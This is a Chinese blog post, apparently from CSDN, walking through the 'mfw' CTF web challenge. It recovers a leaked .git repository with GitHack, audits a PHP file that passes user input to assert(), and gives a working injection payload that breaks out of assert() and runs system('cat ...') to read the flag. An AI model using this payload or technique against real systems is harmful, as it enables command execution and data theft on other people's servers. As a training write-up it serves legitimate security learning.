WEB:mfw

已于 2023-07-31 21:49:10 修改
阅读量532 收藏
点赞数 1
分类专栏: 攻防世界 文章标签: 前端 web安全 网络安全
于 2023-07-31 21:48:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gsumall04/article/details/132030327
版权

背景知识

        Git泄露

        Githack使用

        命令执行漏洞

题目

 这里页面里有Git,猜测是Git泄露

先用dirsearch扫一下

确实存在.git目录,可以尝试访问一下

 使用Githack来下载并恢复.git文件

这里记得使用的时候关闭杀毒软件

结果会自动保存

 点进去先看一下flag这个文件,发现什么都没有

再看一下index.php,进行代码审计

?php
 
if (isset($_GET['page'])) {
	$page = $_GET['page'];
} else {
	$page = "home";
}
//使用get请求方式给page传参,如果没传,默认page=home 

$file = "templates/" . $page . ".php";
//$file变量会接收传入的$page并且在其前面拼接templates/,在其后面拼接.php,PHP中用.来实现字符串的拼接

// I heard '..' is dangerous!
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");

//strpos() 函数会在'$file'这个字符串中进行查找,是否存在'..',当字符串里有'..',则会返回一个数(即'..'第一次出现的位置),结果为true
//与右边的false并不恒等,此时就会执行or右边的die()函数,输出 Detected hacking attempt!
// TODO: Make this look nice
assert("file_exists('$file')") or die("That file doesn't exist!");
 
?>
//file_exists() 函数还会检查我们传入的page拼接后是否存在

 ​​​

 由代码审计可知,file_exists() 函数还会检查我们传入的page拼接后是否存在,在之前的githack下载文件中,templates文件夹中有四个php文件,只要传入的不是这4个,就会执行die函数,输出 That file doesn't exist!

 file_exists()函数不会对获取flag有影响

 assert()函数会将括号中的字符当成代码来执行

可以直接在第一个assert()函数处就调用cat命令来获取flag

传入的page中不能有'..',使strpos()函数返回false,和右边的false相等

payload

?page=123') or system("cat templates/flag.php");//

payload的前半段可以是存在的文件也可是不存在的文件

只需要前半段返回的是false,执行or后面的即可

在最后添加注释//,确保后面的代码不会执行

传入payload的之后,查看网页源代码可以找到flag

 参考学习链接:

攻防世界 mfw(Git源码泄露与命令执行漏洞)_mfw攻防世界_kali-Myon的博客-CSDN博客

攻防世界 mfw(Git源码泄露与命令执行漏洞)_mfw攻防世界_kali-Myon的博客-CSDN博客

sleepywin
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
攻防世界 web mfw
liuxiaohuai_的博客
03-28 288
打开网页点击about: 看到有提示git 那这个题就先从git源码泄露入手把。 在URL后加入.git/进入: 在linux中使用GitHacker脚本 下载方法: pip install requests #安装需要的第三方库,如果已安装请忽略! git clone https://github.com/wangyihang/GitHacker.git python2 GitHacker.py http://111.200.241.244:38019/.git/ #后面的url可以换成自己想扫的网站,
peach-pit-mfwMFW第一天示例
02-25
桃坑制造厂MFW第一天的例子
攻防世界-web-mfw
mlws1900的博客
07-15 299
看到了作者设计的小菜单,mysecrets,还是得利用assert构造payload。可以执行system函数,用cat对flag.php进行抓取。用了git和php,考虑git源码泄露和php的危险函数。打开index.php,对下面这一段代码进行分析。在这个页面看到了flag.php,无法直接打开。利用phps也不显示源码,提示无权限。得知assert()函数可以执行函数。对前面进行闭合,对后面进行注释。打开flag.php空空如也。他让我们随意点击上面的连接。可以看到/.git访问。...
攻防世界:web mfw
Zeker62的博客
09-05 189
目录什么是mfw信息搜集先使用dirsearch扫描目录,看有没有有用的文件:获取泄露的git源码代码审计总结什么是mfw 然而,这和本题没有半毛钱关系 信息搜集 打开页面后,有三个界面: home界面: 翻译一下就是 提示我们:使用上面的链接浏览网页 看看链接: 这个链接的样式就可能存在文件包含漏洞,留个心眼 About界面: 它告诉我们用三个东西开发,发现有git,提示我们可能存在git...
Web(mfw)
m0_56010012的博客
03-05 440
.git源码泄露,.git泄露利用攻击工具GitHack。 在linux系统中输入以下命令,安装好GitHack攻击工具。 安装GitHack工具 git clone https://github.com/lijiejie/GitHack 进入GitHack的目录 cd GitHack 利用GitHack扫描网站。 python GitHack.py http://111.200.241.244:50649/.git/ 尝试进入flag的目录查看文件,发现没有具体内容。 查看index.php的源码
web-mfw解题思路
m0_73734159的博客
06-04 309
git漏洞信息泄露类题目详解。
攻防世界web-mfw
qq_51775369的博客
10-21 135
打开网页随便逛逛,在 about 页面发现他使用了 Git,也就是说可能存在 Git 源码泄露 使用 GitHack 扫描 url,成功把泄露的文件都下载下来。 GitHack.py My PHP WebsiteMy PHP WebsiteMy PHP Website/.git/ 打开 index.php 文件得到题目的源码,源码会接收一个 page 参数 assert() 检查一个断言是否为 FALSE strpos() 函数查找字符串在另一字符串中第一次出现...
攻防世界 WEB mfw
qq_41696858的博客
08-20 183
这题考的是两个点:Git泄露和assert函数执行代码 先说Git泄露,通过About发现该网站使用了Git,查看/.git目录发现确实存在泄露情况 那么下载GitHacker工具查看源码 pip3 install GitHacker githacker --url http://111.200.241.244:60711/ --folder result1 //这里的folder表示的是输出文件夹 然后查看源码,在index.php里面发现assert函数 $file = “templates/” . $
Web mfw Writeup
qq_39596232的博客
08-05 288
实验环境: Kali Linux 实验工具: GitHack(https://github.com/lijiejie/GitHack) dirsearch(https://github.com/maurosoria/dirsearch) 实验步骤: 1、使用Firefox打开给定的网址(111.198.29.45:34650),页面如下: 尝试点击了各种能够点击的地方,发现about中有点意思,...
攻防世界——CSAW CTF 2016 Quals: mfw .git源码泄露——学习
qq_43409582的博客
06-04 802
0x01 今天从攻防世界上又看了一个题打开后,F12看到提示 然后看看结果: 一片空白。em…然后尝试了一些payload都没有用。就去看了下别人写的wp发现是有个新知识点:.git源码泄露。 在百度的时候发现了一片很好的博客:https://blog.csdn.net/qq_36869808/article/details/88909961 整理的很全面很具体。 这次借鉴下大佬的话(链接:h...
Gjhnsn.github.io:MFW投资组合
03-30
引导样板 模板 功能模板 要求 主题 有待确定。
gmfw:基于MFW和BMFW的简单WordPress主题
02-22
GMFW 一个基于MFW和BMFW的简单WordPress主题。 MFW: : BMFW: ://bettermotherfuckingwebsite.com/ 请访问。
mfw-bootstrap
04-02
引导样板
mfw-portfolio:移动友好投资组合决赛'20
03-31
制造组合 移动友好投资组合决赛'20
JS中一个dom元素能绑定多少事件
ggq53219的博客
06-10 590
在JavaScript中,一个DOM元素可以绑定的事件数量并没有明确的限制,这主要取决于浏览器的实现和内存限制。然而,在实际应用中,为同一个DOM元素绑定过多的事件监听器可能会导致性能问题,尤其是在事件处理函数执行复杂操作的情况下。总之,虽然JavaScript中DOM元素可以绑定的事件数量没有明确的限制,但在实际应用中应注意避免过度绑定和优化事件处理函数,以确保良好的性能和用户体验。
Web前端网站设计案例:深入剖析创意与技术的完美融合
liyrbtqe_66w的博客
06-12 318
在性能优化方面,设计师通过压缩代码、减少HTTP请求、使用CDN等技术手段,提升了网站的加载速度和响应性能,为用户提供了更加流畅的访问体验。综上所述,本Web前端网站设计案例通过视觉设计、用户体验、技术实现、性能优化、创意表达、响应式设计和跨平台兼容等方面的综合考量,成功打造了一款既美观又实用的网站。这个案例充分展示了Web前端设计的魅力和潜力,为未来的网站设计提供了有益的借鉴和启示。设计师通过独特的视觉元素和创意构思,将品牌理念和文化内涵融入其中,使得整个网站在传达信息的同时,也展现出品牌的独特魅力。
HTML入门教程:深度解析HTML,开启你的前端技术之旅
最新发布
zhangwenok的博客
06-14 1321
HTML(HyperText Markup Language,超文本标记语言)是前端开发的基础,它负责构建网页的结构和内容。作为前端技术栈的基石,HTML的掌握程度直接影响到网页的开发效率和用户体验。本教程将带你从零开始,逐步深入了解HTML的各个方面,帮助你打下坚实的前端技术基础。HTML是一种用于创建网页的标准标记语言,它通过一系列的元素(elements)和标签(tags)来定义网页的结构和内容。HTML文档由一系列的元素组成,这些元素通过标签来标识。
Web前端设计大赛:创意与技术的碰撞
huejiaqwerty888的博客
06-12 407
在这场竞赛中,参赛者们不仅需要展现出独特的创意,还需要运用精湛的技术将创意转化为实际作品。本文将从四个方面、五个方面、六个方面和七个方面,深入剖析Web前端设计大赛的魅力和挑战。交互设计是Web前端设计的核心环节。参赛者需要关注页面的加载速度、响应速度以及操作的便捷性等方面,确保用户在使用过程中能够获得良好的体验。参赛者需要敢于突破传统的设计理念和技术限制,尝试新的设计手法和技术应用。参赛者需要在创意构思、视觉呈现、交互设计、用户体验、技术实现、性能优化以及创新性和可实践性等方面进行全面考虑和精心打造。
度为2的有序树就是二叉树
09-01
- *3* [第六章 树和二叉树习题1](https://download.csdn.net/download/MFW333/87596042)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值